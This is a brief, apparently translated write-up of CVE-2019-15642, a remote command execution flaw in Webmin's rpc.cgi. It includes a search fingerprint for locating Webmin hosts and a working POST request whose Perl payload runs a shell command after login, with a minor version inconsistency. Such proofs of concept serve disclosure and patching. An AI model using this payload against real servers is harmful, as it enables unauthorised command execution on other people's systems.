Webmin Rpc Cgi Background Remote Command Execution Vulnerability Cve 2019 15642
Webmin Rpc Cgi Background Remote Command Execution Vulnerability Cve 2019 15642
Webmin rpc.cgi background remote command execution vulnerability CVE-2019-15642
Vulnerability Description
Webmin is a set of Web-based system management tools for Unix-like operating systems. There is a security vulnerability in the rpc.cgi file in Webmin 1.920 and previous versions.
Vulnerability Impact
Webmin < 1.920
Network surveying and mapping
app=”webmin”
Vulnerability reappears
Login page
Send request packet after login
1
2
3
4
POST /rpc.cgi
Referer: https://xxx.xxx.xxx.xxx/sysinfo.cgi?xnavigation=1
OBJECT Socket;print "Content-Type: text/plain\n\n";$cmd=`id`;print "$cmd\n\n";
This post is licensed under CC BY 4.0 by the author.